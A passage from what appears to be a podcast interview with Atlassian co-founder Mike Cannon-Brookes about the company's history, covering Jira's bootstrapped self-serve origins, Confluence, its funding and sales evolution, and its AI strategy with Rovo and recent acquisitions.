change how enterprises use browsers, security being a big issue. I think AI in the browser is a really important thing, but I suspect it’s not in the basic way of just combining Chrome and ChatGPT, that’s not how it’s going to play out. I suspect it requires a massive amount of design, which The Browser Company is phenomenal at, and it requires changing how people use their day-to-day applications. From our point of view, and I’ve been an Arc fan since day one, [The Browser Company CEO] Josh [Miller] and I have known each other a long time, there’s a knowledge worker angle and there’s obviously a business angle to it in a huge way, in that our customers are knowledge workers. We can change the way they do their work in a meaningful way on productivity; that is exactly what we have been trying to do in a lot of different ways. The browser itself is Chromium-based, Edge is Chromium-based, Chrome is Chromium-based: the rendering of webpages is not the problem, it is the fundamental user experience of, “How do I take all of my SaaS applications, my agents, my chats, my tabs, my knowledge, and put it all together in ways that make my day quicker?” — that is what we are trying to do fundamentally at the start. The context that we have is incredibly important for that. And the browser has, if you think about it, my personal memory. We used to call it the browser history. Great, it shows what I’ve seen; it does not have my organizational memory, which we have a great example of in the Teamwork Graph. So if I can put these things together, I can make a much more productive browsing experience for customers fundamentally in that world.
I think we have an amazing shot at doing that and at changing how knowledge workers use SaaS. We’re not trying to make a browser, as I’ve said, for my kids, we’re not trying to make a browser for my parents, we’re not trying to make a browser for shopping or for anything else. We’re trying to make a browser for people who spend all day living in Salesforce and Jira and Google Docs and Confluence and Figma and GitHub, and that is their life. For the laptop warrior that sits in that experience, I believe we can use AI and design to make that a far better experience and build an amazing product. They’re well on the way to doing that; we can supercharge doing it. You look skeptical. No, I’m looking at the clock, I skipped over a huge section. Your whole shift to the cloud, all those sorts of things. However, there is one thing I wanted to get to: you are wearing an Atlassian Williams Racing hat, I am a big F1 fan, I was very excited about you doing this. How did that come about? How was the first year? Was this another hunch this is going to work out? I mean, Williams is looking like a pretty good bet. MCB: Yes, our world’s largest sports bet. Look, how did it come about? So how do I make a short answer? F1 is changing, I think, in a massive way. I know now, being incredibly deep in the business of it: the fundamental change is that hardware is becoming less important and software is becoming more important, and this is a trend that we are used to. JV, James Vowles, the Team Principal, was the first person that approached us, a long while ago now, for a teeny, teeny sticker in the corner, to help them get more productive as a team. What people don’t realize about F1 is these are large organizations, right? There are 1,100 people that work for Atlassian Williams Racing. And Williams was really pared down and skinny; he was brought back in with new owners to actually rebuild the entire thing? MCB: Yes, they were in deep trouble. But in rebuilding it, he is a software engineer, software developer by trade, by history kind of thing. He’s a technically-minded person. He downloaded Jira himself in 2004 to install it, so he knows us quite well. So we were brought on for our ability to help them with their teamwork and their collaboration; they really needed a technical upgrade to a whole lot of their systems. Turns out they need us in almost every part of their business because the service workflow’s important. We’re now in the garage, we’re using tons of AI to try to make them better, so there’s a lot of things we can do to build to hopefully help them win, and it’s a mission you can fall in love with. Here is one of the most storied brands in Formula 1 that’s fallen on tough times, and every sportsperson loves a recovery story. And I was sold early on the recovery story, I’m like, “Fuck it, let’s go help, let’s make this happen. Let’s get back to being a championship team”. So we fell in love with the mission, and JV is super compelling, he’s got a one-decade goal, and they’re very goal-driven, and we love that, but they needed a lot of help, so that’s what they asked us for help with initially. The more we looked at it, the more we learned about Formula 1, yes, it’s becoming a software-driven sport. So as an example, Atlassian Williams, I believe, has twice as many software developers as the next team on the grid. Because it’s cost-capped, you’ve got to choose, “Do I hire a software developer or an aerodynamicist?” — it’s a very clear cost cap, you’re choosing where to put your resources.
As virtualization and everything get better, it’s less, “How well can I draw a curve?” and more, “How much can I help 1,100 people work together, and how can we build great software?”, which really is the core of the car, right? So that then comes to us, tiny sticker, probably a founder-ish moment where I’m like, “How much is the sticker on the top?”, and they didn’t have a sticker on the top and I’m like, well, “What would that get us?” So we ran the numbers on that, and the reason is twofold. You talked about our GTM, our go-to-market transformation; we have an ability to build various things. Firstly, branding is obviously massive: top three teams get 10 times the branding of the bottom three teams. So if you’re going to make a sports bet, you pay for a long period of time with a bottom-three team, you help make them a top three team, and your sports bet pays out really well just on sheer TV time, etc. — the number of parents of staff, and others, who have said to staff members, “Hey, that company you work for, it’s really great, I saw them on the TV on the weekend”, and the staff member will say, “Dude, I’ve worked there for 12 years, why do you suddenly know about it?”, “Oh, I saw them driving. Carlos [Sainz Jr.] is great”, or something. And he is! So obviously, there’s a huge marketing and branding angle that’s about their position being better. The really interesting part of what we’re doing there is we have customers all around the world, we have customers in 200-odd countries, and we can’t go and visit all of our biggest customers in a meaningful way. We certainly can’t take them to some of our best and most exciting customers, right? There are electric car companies that use our stuff where we’d love to take many customers to a factory, or rockets, or whoever; I can’t take many customers into some of your favorite chip companies and say, “Look how they use our stuff”, I can maybe get one or two customers a year into that customer and show them how they use our things. With Formula 1, what we’re building is a mobile EBC, so an executive briefing center. Formula 1 goes around the world. It goes to Melbourne, it goes to Singapore, it goes to Japan, it goes to England, it goes to various parts of Northern Europe, it goes to various parts of America, and you’re like, “Hey, where are our customers?” — roughly distributed like that. It comes to town, we can invite a whole lot of customers into a great experience, we can tell them a lot about Atlassian software, and we can also invite them into one of our best customers. They can sit in the garage, and I can tell them how our service collection is helping power the assets: when that wing’s broken, it gets known here, and they start making a new one back in the factory in Oxford, and this one gets shipped around the world and another one will get moved. And, “Here, I can show you the asset management and the service that goes along with it, I can show you how the garage is getting more efficient because of us, I can show you how we’re helping them win races”. We don’t drive cars, we help them be more productive as a team, and I can do that in an exciting environment. They can drink a great latte or a champagne or whatever they want, and I can explain to them how we are transforming this business in a meaningful way with our tools, no matter which way they want to look at it, which is the most powerful customer story that you can go and tell a couple-hundred customers a year in their city. We come to their city, right?
I was in Montreal, I took a whole bunch of Canadian customers over the three days, they were like, “This changes my view of Atlassian”, and I’m like, “That’s exactly our goal”; that is at the enterprise end of enterprise sales though, right? But that’s the ironic thing, it’s as far away from where you started as you could be. MCB: Well, they didn’t get there. I met two Canadian banks we had in Montreal as an example, both of whom had been customers for over 20 years; they started spending 800 bucks, or maybe $4,800 as we moved our pricing to around five grand — now they spend a million, two million dollars a year, and they could be spending ten. We have the ability to give massive business value across a far larger swath of their business. And I can say, “What do you use from our system of work today? What could you use? Let me show you how Williams uses that piece of the system of work”, which is just a very visceral and exciting customer example to show them how they’re winning. And it helps, again, culturally, super aligned. They’re an awesome group of people trying really hard to win in the most ridiculously competitive sport, and the highs are high, the lows are low. Any sporting fan, you’re well familiar with various different sports that we have in common, but this is technology built by a large business team that has to win a sport. That doesn’t happen anywhere else in the sporting world, I would claim. Giannis [Antetokounmpo] doesn’t make his own shoes and have a team of people making better shoes and a better basketball so he can win; that doesn’t happen in other sports. It’s all about the people on the floor in an NBA game as to who wins, and that’s great, don’t get me wrong, I love basketball. The work in Formula 1 is done by 1,000 people back in Oxford. It’s a Constructors’ Championship. MCB: The Constructors’ Championship I do think should be more important, especially given the current exact week we’re in, which is an amazing week for Atlassian Williams Racing, second podium. You talk about that bet. I told JV at the start of the year: he’s like, “What do you think our five-year future is?”, and I said, “Look, I think, number one, we’ll get one podium this year, 2025; 2026, we’ll win a race; and by 2030, we will have won a championship, those are my OKRs [Objectives and Key Results]”, and he said, “Oh, wow, okay, yeah I think so”. It lines up, I know the team OKRs and other things. And we won two podiums this year, so I was wrong, and I think we have a great chance for 2026, and we are working hard to make the team better and the single-best customer example we have of every piece of software that we sell. Mike, I’d love to talk again. It was great talking to you again. And, hey, good luck. And I’m a Williams fan, so I’ll be cheering for you this weekend. MCB: Oh, yeah. Well, I’m not sure this weekend, but 2026, 2027- Okay. I’m kind of kissing up; I am dying for Max [Verstappen] to win, is the honest truth. I need the McLarens to run into each other. But other than that, Williams is my second love. MCB: Do you think McLaren will issue team orders to switch them if Oscar is in second and Lando’s in fourth? Yes. And I don’t know what’s going to happen if that happens, and this will be fascinating. MCB: We will have to see. It’s going to be a huge week. But that’s what makes the sport exciting, right? The whole thing is amazing. Talk to you later. MCB: All right. Thanks, man. This Daily Update Interview is also available as a podcast.
To receive it in your podcast player, visit Stratechery.

0 views
Brain Baking 1 month ago

Favourites of November 2025

The more holiday seasons I see coming and going, the less enthused I am by the forced celebration that tastes an awful lot like capitalism. I put up my gift guide anyway, just in case anyone is willing to buy me that dough mixer; otherwise I’ll have to do it in January as an early expense for the upcoming year. Thanks in advance! There isn’t a lot of mental space left to prepare for celebrations anyway, with the second kid giving us an equally hard time as the first. Anyway. Welcome, last month of the year, I guess. The first one who plays Last Christmas is out. Previous month: September 2025. Not really. None, to be very precise. But I did buy yet another one: Mara van der Lugt’s Hopeful Pessimism, which sounded like it was written for me. I expect equally great and miserable things from this work. I’ve only had the time to write the review for Rise of the Triad: Ludicrous Edition (ROTT), which I ended up buying for the Nintendo Switch thanks to Limited Run Games’ stock overflow. It felt wonderfully weird to be playing a 1994 DOS cult classic on the Switch. And yes, the Ludicrous Edition is ludicrous. I finally made it past the third map! I’m still feeling the retro shooter vibe and bought the Turok Trilogy on a whim after learning it was also done by Nightdive Studios. Another smaller game I played in-between the ROTT sessions was Shotgun King, which somehow manages to combine chess with shotguns, and very successfully so. Unfortunately, it’s a bit of a bare-bones roguelike, difficult as hell, and therefore not really my forte. I have yet to unlock all the shotguns. Don’t buy the game on macOS: GOG ended up refunding my purchase because it kept on crashing in the introduction cutscene. The Switch edition is fine. Slightly game-related: my wife sent me this YouTube video where Ghostfeeder explains how he uses the Game Boy to make music, which I think is worth sharing here. Charlie Theel put up a post called Philosophy and Board Games on Player Elimination where I learned about Mara’s Hopeful Pessimism. On a slightly more morbid topic, Wesley thought about How Websites Die and shared his notes. Lina’s map of the internet functions as a beautiful pixelated website map that inspires me to do something similar. Kelson Vibber reviews web browsers. The sad state of Mozilla made me look elsewhere, and I’m currently using both Firefox and Vivaldi. According to Hypercombogamer the Game Boy Advance is Nintendo’s Most Underrated Handheld. I don’t know if I agree, but I do agree that both the GBA and its huge library are awesome. Eurogamer regularly criticises Microsoft and their dumb Xbox moves. The last piece was the ridiculous Game Pass advent. Matt Bee’s retro gaming site is loaded with cool-looking game badges that act as links to small opinion pieces. It’s a fun guessing game as I’m not familiar with some of the pixel art. Astrid Poot writes about lessons learned about making and happiness. Making is the route to creativity. Making is balance. Alyssa Rosenzweig proves that AAA gaming on Asahi Linux is totally possible. Patrick Dubroy has thoughts on ways to do applied research. His conclusion? Aim for practical utility first, by “building something that addresses an actual need that you have”. Eat your own dog shit, publish later? Here’s another way to block LLM crawlers without JavaScript by Uggla. Wolfgang Ziegler programs on the Game Boy using Turbo Rascal, something I hadn’t encountered before.
Wes Fenlon wrote a lengthy document over at PC Gamer on how to design a metroidvania map. Jan Ouwens claims there are no good Java code formatters out there. Seb shared A Road to Common Lisp after I spotted his cool “warning: made with Lisp” badge. A lot of ideas are taking form, to be continued… Speaking of Lisp: Colin Woodbury is drawn to Lisp because of its simplicity and beauty. Robert Lützner wrote an honest report on the duality of being a parent. As a parent myself, I found myself sobbing and nodding in agreement as I read the piece. Michael Klamerus shares his thoughts on Crystal Caves HD. The added chiptune music just feels misplaced in my opinion. I’m looking forward to the Bio Menace remaster as well! Felienne Hermans criticizes the AI Delta Plan (in Dutch). We should stop proclaiming build, build, build! as the slogan of the future and start thinking about reduce & re-use. Hamilton shares his 2025 programming language tier list. The funny thing is that number one on the list suddenly got replaced by a more conventional alternative. I don’t agree with his reasoning at all (spoiler: it contains AI), but it’s an interesting read nonetheless. Mikko Saari published his 2025 edition of the top 100 board game list a little earlier this year. There are a bunch of interesting changes in the top 10! SETI also pops up quite high on my list, but I haven’t had the chance to create it yet. If you live near The Netherlands, consider visiting The Home Computer Museum. They also have a ton of retro magazines lying around to flip through! Wait, there’s a Heroes of Might & Magic card game? That box looks huge! (So does the backing price…) Death Code is an entirely self-hosted web application that utilizes Shamir’s Secret Sharing to share secrets after you die. tttool is a reverse-engineering effort to inspect how the Tip Toi educational pens work. I was somehow featured at https://twostopbits.com/ and now I know why: it’s Hacker News for retro nerds. Apparently things like WhatsApp bridges for Matrix exist, which got me thinking: can I run bridges for WhatsApp and Signal to merge all messaging into The One Ring? Emulate Windows 95 right in the browser. Crazy to see what you can do nowadays with WASM/JS/whatever. It looks like LDtk is the best 2D game map editor ever created. Wild Weasel created a retro-looking Golf video game shrine in their little corner of the internet, and the result is lovely. I should really start playing my GBC Mario Golf cart. Related topics: / metapost / By Wouter Groeneveld on 3 December 2025. Reply via email.

10 views
blog.philz.dev 1 month ago

Coverage

Sometimes, the question arises: which tests trigger this code here? Maybe I've found a block of code that doesn't look like it can be hit, but it's hard to prove. Or I want to answer the age-old question of which subset of quick tests might be useful to run if the full test suite is kinda slow. So, run each test with coverage by itself. Then, instead of merging all the coverage data, find which tests cover the line in question. Oddly enough, though some of the Java tools (e.g., Clover) support per-test coverage, the tools here in general are somewhat lacking. genhtml, part of the lcov suite, supports a TN: ("test name") marker, but only displays the per-test data on a per-file level. This is the kind of thing where in 2025, you can ask a coding agent to vibe-code or vibe-modify a generator, and it'll work fine. I have not found the equivalent of Profilerpedia for coverage file formats, but the lowest common denominator seems to be LCOV. The file format is described at geninfo(1). Most language ecosystems can either produce LCOV output directly or have pre-existing conversion tools.
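Since LCOV tracefiles are plain text (TN:, SF:, and DA:<line>,<count> records), the "which tests cover this line" query is a small script away. A minimal sketch, assuming one .info file per test sits in a directory (names and layout here are my own, not from any tool):

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.stream.Stream;

// Given a directory of per-test LCOV tracefiles, print which tests
// cover a given source file and line, e.g.: WhoCoversThisLine cov/ Foo.java 42
public class WhoCoversThisLine {
    public static void main(String[] args) throws IOException {
        Path dir = Path.of(args[0]);   // directory with one <test>.info per test
        String file = args[1];         // suffix of the SF: (source file) record
        String line = args[2];         // line number to look up
        try (Stream<Path> tracefiles = Files.list(dir)) {
            tracefiles.filter(p -> p.toString().endsWith(".info")).forEach(p -> {
                boolean inFile = false;
                try {
                    for (String record : Files.readAllLines(p)) {
                        if (record.startsWith("SF:")) {
                            // SF: opens a per-file section inside the tracefile
                            inFile = record.substring(3).endsWith(file);
                        } else if (inFile && record.startsWith("DA:" + line + ",")
                                && !record.startsWith("DA:" + line + ",0")) {
                            // DA:<line>,<execution count>: a nonzero count means covered
                            System.out.println(p.getFileName() + " covers " + file + ":" + line);
                            break;
                        }
                    }
                } catch (IOException e) {
                    throw new UncheckedIOException(e);
                }
            });
        }
    }
}
```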

0 views
Brain Baking 1 month ago

Using Energy Prediction To Better Plan Cron Jobs

Since the Belgian government mandated the use of digitized smart energy meters, we’ve been more carefully monitoring our daily energy demand. Before, we’d simply chuck all the dishes in the machine and program it to run at night: no more noise when we’re around. But now, consuming energy at night is costing us much more. The trick is to take as little as possible from the grid, but also put as little as possible back. In short, consume (or store) energy when our solar panels produce it. That dishwasher will have to run at noon instead. The same principle applies to running demanding software: CPU- or GPU-intensive tasks consume an awful amount of energy, so why run them when there’s less energy available locally, thus paying more? Traditionally, these kinds of background jobs are always scheduled at night using a simple cron expression like “0 3 * * *” that says “At 03:00 AM, kick things in gear”. But we can do better. At 03:00 AM, our solar panels are asleep too. Why not run the job when the sun is shining? Probably because you don’t want to interfere with the heavy load of your software system during the day thanks to your end users. It’s usually not a good idea to start generating PDF files en masse, clogging up all available threads, severely slowing down the handling of incoming HTTP requests. But there’s still a big margin to improve the planning of the job: instead of saying “At 03:00 AM exactly”, why can’t we say “Between 01:00 AM and 07:00 AM”? That’s still before the big HTTP rush, and in the early morning, chances are there’s more cheap energy available to you. Cooking up a simple version of this for home use is easy with the help of Home Assistant. The following historical graph shows our typical energy demand during the last week (dreadful Belgian weather included): Home Assistant history of P1 Energy Meter Demand from 24 Nov to 28 Nov. Care to guess what these spikes represent? Evenings. Turning on the stove, the oven, the lights, the TV obviously creates a big spike in energy consumption, and at the same time, the moon replacing the sun results in us taking instead of giving from the energy grid. This is the reason the government charges more then: if everybody creates spikes at the same time, there’s much more pressure on the general grid. But I can’t bake my fries at noon when I’m at work, and we aren’t supposed to watch TV when we’re working from home… That data is available through the Home Assistant history API (/api/history/period/…). Use an authorization header with a Bearer token created in your Home Assistant profile. If you collect this for a few weeks and average the results, you can make an educated guess when demand will be going up or down. If you want things to get a bit more fancy, you can use the EMHASS Home Assistant plug-in that includes a power production forecast module. This thing uses machine learning and other APIs such as https://solcast.com/ that predict solar power—or weather in general: the better the weather, the more power available to burn through (given you’ve got solar panels installed). EMHASS also internalizes your power consumption habits. Combined, its prediction model can help to better plan your jobs when energy demand is low and availability is high. You don’t need Home Assistant to do this, but the software does help smooth things over with centralized access to data using a streamlined API. Our energy consumption and generation is measured using HomeWizard’s P1 Meter that plugs into our provider’s digital meter and sends the data over to Home Assistant.
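For the curious, pulling that history out programmatically is only a couple of lines. A minimal sketch against Home Assistant’s REST history endpoint—the host, entity id, and date are placeholders for your own setup:

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

// Fetch the recorded power demand of a (hypothetical) P1 meter sensor
// from Home Assistant's /api/history/period endpoint.
public class EnergyHistory {
    public static void main(String[] args) throws Exception {
        String token = System.getenv("HA_TOKEN"); // long-lived token from your HA profile
        URI uri = URI.create("http://homeassistant.local:8123"
                + "/api/history/period/2025-11-24T00:00:00%2B01:00"
                + "?filter_entity_id=sensor.p1_meter_power");
        HttpRequest request = HttpRequest.newBuilder(uri)
                .header("Authorization", "Bearer " + token)
                .header("Content-Type", "application/json")
                .build();
        HttpResponse<String> response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.ofString());
        // The body is a JSON array of state changes; average these per
        // hour over a few weeks to spot the evening spikes.
        System.out.println(response.body());
    }
}
```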
That’s cool if you are running software in your own basement, but it will hardly do on a bigger scale. Instead of monitoring your own energy usage, you can rely on grid data from the providers. In Europe, the European Network of Transmission System Operators for Electricity (ENTSO-E) provides APIs to access power statistics based on your region—including a day-ahead forecast! In the USA, there’s the U.S. Energy Information Administration (EIA) providing the equivalent, also including a forecast, depending on the state. ENTSO-E returns a day-ahead pricing model while EIA returns consumption in megawatt-hours, but both statistics can be used for the same thing: to better plan that cron job. And that’s exactly what we at JobRunr managed to do. JobRunr is an open-source Java library for easy asynchronous background job scheduling that I’ve had the pleasure to work on the last year. Using JobRunr, planning a job with a cron expression is trivial. But we don’t want that thing to trigger at 3 AM, remember? Instead, we want it to trigger within an interval, when the energy prices are at their lowest, meaning when the CPU-intensive job will produce the least amount of CO2. In JobRunr v8, we introduced the concept of Carbon Aware Job Processing that uses the energy predictions of the aforementioned APIs to better plan your cron jobs. The configuration for this is ridiculously easy: (1) tell JobRunr which region you’re in, (2) adjust that cron. Done. Instead of “0 3 * * *”, use a margin-extended variant along the lines of “0 3 * * * [PT1H/PT4H]”: this means “plan somewhere between an hour before 3 AM and four hours later than 3 AM, when the lowest amount of CO2 will be generated”. That string is not a valid cron expression but a custom extension on it we invented to minimize configuration. Behind the scenes, JobRunr will look up the energy forecasts for your region and plan the job according to your specified time range. There are other ways to plan jobs (e.g. fire-and-forget, providing Instants instead of a cron, …), but you get the gist. JobRunr’s dashboard can be consulted to inspect when the job is due for processing. Since the scheduled picks can sometimes be confusing—why did it plan this at 6 AM and not at 7?—the dashboard also visualizes the predictions. In the following screenshot, you can see a job being planned at 15:00, with an initial interval between 09:39 and 17:39 (GMT+2): The JobRunr dashboard: a pending job, to be processed on Mon Jul 07 2025 at 15:00. There’s also a practical guide that helps you get started if you’re interested in fooling around with the system. The idea here is simple: postpone firing up that CPU to the moments with more sunshine, when energy is more readily available, and when less CO2 will be generated 1 . If you’re living in Europe/Belgium, you’re probably already trying to optimize the energy consumption in your household the exact same way because of the digital meters. Why not apply this principle on a grander scale? Amazon offers EC2 Spot Instances to “optimize compute usage”, which is also marketed as more sustainable, but this is not the same thing. Shifting your cloud workload to a Spot Instance will use “spare energy” that was already being generated. JobRunr, and hopefully soon other software that optimizes jobs based on energy availability, plans using marginal changes. In theory, the scheduling decision can even determine the fuel source, as high demand spikes force high-emission plants to burn more fuel. In always-on infrastructure, spare compute capacity is sold as the Spot product—there’s no marginal change.
The environmental impact of planning your job to align with low grid carbon intensity is much higher—in a good way—compared to shifting cloud instance types from on-demand/reserved to Spot. Still, it’s better than nothing, I guess. If the recent outages of these big cloud providers have taught us anything, it’s that on-premise self-hosting is not dead yet. If you happen to be rocking Java, give JobRunr a try. And if you’re not, we challenge you to implement something similar and make the world a better place! You probably already noticed that in this article I’ve interchanged carbon intensity with energy availability. It’s a lot more complicated than that, but for the purpose of Carbon Aware Job Processing, we assume a strong relationship between the electricity price and CO2 emissions.  ↩︎ Related topics: / java / By Wouter Groeneveld on 28 November 2025. Reply via email.

0 views
Hugo 1 month ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message:

> Huge vuln on writizzy
>
> Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd. Basically, you absolutely need to validate the images from the Medium HTML!
>
> Your /etc/passwd as proof:
>
> Micka

Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities.

## The SSRF Vulnerability

SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive?

The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page:

```html
<img src="https://miro.medium.com/max/1400/image.jpg" />
```

I need to download the image, then re-upload it to Bunny. During the conversion to markdown, I'll then write this:

```markdown
![](https://cdn.bunny.net/blog/12132132/image.jpg)
```

So to do this, at some point I open a URL to the image:

```kotlin
val imageBytes = try {
    val connection = URL(imageUrl).openConnection()
    connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
    connection.setRequestProperty("Referer", "https://medium.com/")
    connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
    connection.connectTimeout = 10000
    connection.readTimeout = 10000
    connection.getInputStream().use { it.readBytes() }
} catch (e: Exception) {
    logger.warn("Failed to download image $imageUrl: ${e.message}")
    return imageUrl
}
```

Then I upload the byte array to Bunny. Okay. But what happens if the user writes this:

```html
<img src="file:///etc/passwd" />
```

The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.:

```html
<img src="http://localhost:8080/internal-admin" />
```

The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used:

```kotlin
if (url.protocol !in listOf("http", "https")) {
    logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl")
    return imageUrl
}
```

Then, verify that we're not attacking private URLs:

```kotlin
val host = url.host.lowercase()
if (isPrivateOrLocalhost(host)) {
    logger.warn("Blocked private/localhost URL: $imageUrl")
    return imageUrl
}

...

private fun isPrivateOrLocalhost(host: String): Boolean {
    if (host in listOf("localhost", "127.0.0.1", "::1")) return true
    val address = try {
        java.net.InetAddress.getByName(host)
    } catch (_: Exception) {
        return true // When in doubt, block it
    }
    return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress
}
```

But here, I still have a risk. The user can write:

```html
<img src="https://attacker.com/image.jpg" />
```

And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd.
So we need to block redirect requests:

```kotlin
val connection = url.openConnection()
if (connection is java.net.HttpURLConnection) {
    connection.instanceFollowRedirects = false
}
connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
connection.setRequestProperty("Referer", "https://medium.com/")
connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
connection.connectTimeout = 10000
connection.readTimeout = 10000

val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode
if (responseCode in listOf(301, 302, 303, 307, 308)) {
    logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)")
    return imageUrl
}
```

Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka:

> You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :)

## The XXE Vulnerability

XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to:

- Read local files (/etc/passwd, config files, SSH keys...)
- Perform SSRF (requests to internal services)
- Perform DoS (billion laughs attack)

Micka modified the WordPress XML file to add an entity declaration:

```xml
<!DOCTYPE rss [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
...
&xxe;
```

This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly:

```xml
<!DOCTYPE rss [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
```

And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd):

```xml
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?%file;'>">
%all;
```

Finally, to crash a server, the attacker could also have done this:

```xml
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!-- ...and so on, up to lol9 -->
]>
<title>&lol9;</title>
<wp:post_id>1</wp:post_id>
<wp:status>publish</wp:status>
<wp:post_type>post</wp:post_type>
```

This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea. We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities:

```kotlin
val factory = DocumentBuilderFactory.newInstance()

// Disable external entities (XXE protection)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
factory.setFeature("http://xml.org/sax/features/external-general-entities", false)
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false)
factory.isXIncludeAware = false
factory.isExpandEntityReferences = false
```

I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.

0 views
Brain Baking 1 month ago

Rendering Your Java Code Less Error Prone

Error Prone is Yet Another Programming Cog invented by Google to improve their Java build system. I’ve used the multi-language PMD static code analyser before (don’t shoot the messenger!), but Error Prone takes it a step further: it hooks itself into your build system, converting programming errors into compile-time errors. Great, right, detecting errors earlier, without having to kick an external process like PMD into gear? Until you’re forced to deal with hundreds of errors after enabling it: sure. Expect a world of hurt when your intention is to switch to Error Prone just to improve code linting, especially for big existing code bases. Luckily, there’s a way to gradually tighten the screw: first let it generate a bunch of warnings, and only when you’ve tackled most of them, turn on Error! Halt! mode. When using Gradle with multiple subprojects, things get a bit more convoluted. This mainly serves as a recollection of things that finally worked—feeling of relief included. The root Gradle build file: The first time you enable it, you’ll notice a lot of nonsensical errors popping up: that’s what that is for. We currently have the following errors disabled:

- —that’s a Google-specific one? I don’t even agree with this thing being here…
- —we’d rather have on every line next to each other
- —we can’t update to JDK9 just yet
- —we’re never going to run into this issue
- —good luck with fixing that if you heavily rely on reflection

Error Prone’s powerful extendability resulted in Uber picking up where Google left off by releasing NullAway, a plug-in that does annotation-based null checking, fully supporting the JSpecify standard. That is, it checks for stupid stuff like dereferencing a value that might be null. JSpecify is a good attempt at unifying these annotations—last time I checked, IntelliJ suggested auto-importing them from five different packages—but the biggest problem is that you’ll have to dutifully annotate where needed yourself. There are OpenRewrite JSpecify recipes available to automatically add them, but that won’t even cover 20% of the cases, as when it comes to manual if-null checks, NullAway is just too stupid to understand what your intentions are. NullAway assumes non-null by default. This is important, because in Java object terminology, everything is nullable by default. You won’t need to add a lot of annotations, but adding @Nullable has a significant ripple effect: if that’s nullable, then the object calling this object might also be, which means I should add this annotation here and here and here and here and here and… Uh oh. After 100 compile errors, Gradle gives up. I fixed 100 errors, recompiled, and 100 more appeared. This fun exercise lasted almost an entire day until I was the one giving up. The potential commit touched hundreds of files and added more bloat to an already bloated (it’s Java, remember) code base. Needless to say, we’re currently evaluating our options here. I’ve also had quite a bit of trouble picking the right combination of plug-ins for Gradle to get this thing working. In case you’d like to give it a go, extend the above configuration with the NullAway plug-in. You have to point NullAway to the base package path (the AnnotatedPackages option) otherwise it can’t do its thing. Note the configuration: we had a lot of POJOs with private constructors that set fields to null while they actually cannot be null because of serialisation frameworks like Jackson/Gson. Annotate these accordingly and NullAway will ignore them. If you thought fixing all Error Prone errors was painful, wait until you enable NullAway. Every single nullable statement needs its annotation. OpenRewrite can help, but up to a point, as for more complicated assignments you’ll need to decide for yourself what to do. Not that the exercise didn’t bear any fruit.
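For a concrete picture of the ripple effect, a minimal sketch of the kind of code NullAway rejects (class and method names are made up):

```java
import org.jspecify.annotations.Nullable;

public class Greeter {
    // Without the annotation, NullAway assumes this never returns null.
    static @Nullable String findNickname(String userId) {
        return userId.isEmpty() ? null : "bill";
    }

    public static void main(String[] args) {
        String nickname = findNickname("");
        // NullAway compile error: dereferenced expression nickname is @Nullable
        System.out.println(nickname.length());
        // The fix NullAway does understand: a plain null check first.
        if (nickname != null) {
            System.out.println(nickname.length());
        }
    }
}
```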
